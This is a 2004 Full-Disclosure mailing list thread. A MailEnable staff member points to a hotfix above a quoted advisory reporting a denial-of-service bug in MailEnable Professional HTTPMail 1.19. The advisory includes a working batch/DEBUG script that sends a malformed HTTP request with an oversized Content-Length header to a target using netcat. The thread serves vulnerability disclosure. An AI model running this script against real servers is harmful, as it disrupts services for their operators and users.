RE: [Full-Disclosure] DOS@MEHTTPS

["Peter Fregon" <peter@xxxxxxxxxxxxxx>]

Thanks,

A hotfix for this bug is available from:

http://www.mailenable.com/hotfix


Peter Fregon
MailEnable Pty. Ltd.


-----Original Message-----
From: full-disclosure-admin@xxxxxxxxxxxxxxxx
[mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of CoolICE
Sent: Monday, 2 August 2004 5:19 PM
To: suggest
Cc: bugtraq; full-disclosure; list
Subject: [Full-Disclosure] DOS@MEHTTPS

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:   MailEnable Professional HTTPMail 
:Vendors:       http://www.mailenable.com/
:Version:       1.19
:Platforms:     Windows
:Bug:           D.O.S
:Date:          2004-07-30
:Author:        CoolICE
:E_mail:        CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof ;set PORT=8080 ;if not
'%2'=='' set PORT=%2 ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not
exist nc.exe echo Need nc.exe&&goto :eof ;DEBUG < %~s0 ;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html